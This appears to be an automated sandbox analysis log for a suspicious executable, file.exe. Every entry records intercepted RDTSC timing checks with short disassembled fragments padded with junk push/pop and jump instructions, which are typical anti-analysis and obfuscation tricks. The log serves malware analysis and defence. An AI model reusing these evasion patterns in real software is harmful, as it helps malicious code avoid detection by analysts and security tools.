Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9680 second address: 5C9686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C990D second address: 5C9916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9916 second address: 5C991C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C991C second address: 5C9920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9A7C second address: 5C9A8C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B477E786h 0x00000008 je 00007F40B477E786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9A8C second address: 5C9A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D32EC second address: 5D330D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E799h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D330D second address: 5D3312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D3312 second address: 5D331E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545126 second address: 545132 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B515FBFEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2E19 second address: 5D2E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E796h 0x00000007 push edx 0x00000008 jno 00007F40B477E786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FC4 second address: 5D2FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FC9 second address: 5D2FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F40B477E786h 0x0000000a jns 00007F40B477E786h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FD9 second address: 5D2FF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC08h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FF5 second address: 5D3005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F40B477E786h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D5B59 second address: 5D5B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC17E second address: 5DC192 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC192 second address: 5DC19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC19A second address: 5DC19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC19F second address: 5DC1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC1A5 second address: 5DC1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB8F second address: 5DBBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push esi 0x00000007 jbe 00007F40B515FC13h 0x0000000d jmp 00007F40B515FC07h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E18D4 second address: 5E18EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B477E790h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E18EA second address: 5E18FF instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B515FBFCh 0x00000008 jc 00007F40B515FBF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E18FF second address: 5E1908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1908 second address: 5E190E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E07F6 second address: 5E0808 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F40B477E786h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0808 second address: 5E080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0962 second address: 5E0989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E78Eh 0x00000009 jmp 00007F40B477E795h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590BF6 second address: 590BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590BFA second address: 590CA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F40B477E79Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007F40B477E78Fh 0x00000017 pop ebx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F40B477E788h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jmp 00007F40B477E793h 0x00000038 mov ebx, dword ptr [ebp+12484B88h] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F40B477E788h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 add eax, ebx 0x0000005a or cx, B08Bh 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jne 00007F40B477E788h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590CA8 second address: 590CB2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B515FBFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590CB2 second address: 590D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F40B477E788h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jc 00007F40B477E792h 0x00000029 jp 00007F40B477E78Ch 0x0000002f mov edx, dword ptr [ebp+1244F401h] 0x00000035 movzx ecx, dx 0x00000038 push 00000004h 0x0000003a sub di, 82F1h 0x0000003f nop 0x00000040 jmp 00007F40B477E795h 0x00000045 push eax 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590D14 second address: 590D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590D18 second address: 590D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5845 second address: 5E584B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4A39 second address: 5E4A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F40B477E786h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4BA5 second address: 5E4BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 js 00007F40B515FBF6h 0x0000000d jno 00007F40B515FBF6h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4BB9 second address: 5E4BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4BC3 second address: 5E4BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FC05h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4EBB second address: 5E4EC7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E786h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E530E second address: 5E532A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B515FBF6h 0x0000000a jmp 00007F40B515FC01h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E532A second address: 5E5330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5330 second address: 5E5336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5336 second address: 5E5368 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F40B477E798h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F40B477E78Ch 0x00000019 jnl 00007F40B477E786h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5368 second address: 5E5389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F40B515FC01h 0x0000000c popad 0x0000000d jo 00007F40B515FBFCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ECBFC second address: 5ECC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ECC0D second address: 5ECC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ECC15 second address: 5ECC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC5C second address: 5EAC60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC60 second address: 5EAC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B477E793h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC79 second address: 5EAC8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC8C second address: 5EACAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E792h 0x00000009 je 00007F40B477E786h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EACAC second address: 5EACD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F40B515FBF6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F40B515FBF6h 0x00000014 jmp 00007F40B515FC01h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB1D8 second address: 5EB1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB1DC second address: 5EB1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F40B515FBF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F40B515FBFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB4CC second address: 5EB4E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E797h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB4E9 second address: 5EB4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC59E second address: 5EC5BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E795h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC5BB second address: 5EC5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC5C1 second address: 5EC5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC872 second address: 5EC885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F40B515FBF6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F40B515FBF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC885 second address: 5EC88B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC88B second address: 5EC891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F342D second address: 5F343E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B477E786h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F71D2 second address: 5F71E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F40B515FBF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6598 second address: 5F659C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F659C second address: 5F65A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6715 second address: 5F6719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6719 second address: 5F6744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F40B515FC06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6B6A second address: 5F6B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6B6F second address: 5F6B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC03h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6EB3 second address: 5F6ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F40B477E791h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FCA63 second address: 5FCA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FCA6D second address: 5FCA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jl 00007F40B477E798h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F40B477E786h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FCA81 second address: 5FCA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FD021 second address: 5FD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FD025 second address: 5FD02B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FDFA3 second address: 5FDFC4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E790h 0x00000008 jmp 00007F40B477E78Ah 0x0000000d pushad 0x0000000e jnp 00007F40B477E786h 0x00000014 jnp 00007F40B477E786h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146DD second address: 6146E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146E7 second address: 6146EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146EB second address: 6146F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146F5 second address: 6146F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61824C second address: 618259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F40B515FBF6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622FD5 second address: 622FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622FD9 second address: 622FDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628433 second address: 62846E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a popad 0x0000000b jns 00007F40B477E788h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jmp 00007F40B477E799h 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jns 00007F40B477E78Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62846E second address: 628472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FA13 second address: 62FA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F40B477E786h 0x0000000e jne 00007F40B477E786h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FB6A second address: 62FB70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FB70 second address: 62FB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FB74 second address: 62FB82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FF66 second address: 62FF74 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F40B477E788h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FF74 second address: 62FF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63012C second address: 630139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 630139 second address: 63013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63013F second address: 63015F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F40B477E793h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63015F second address: 630164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
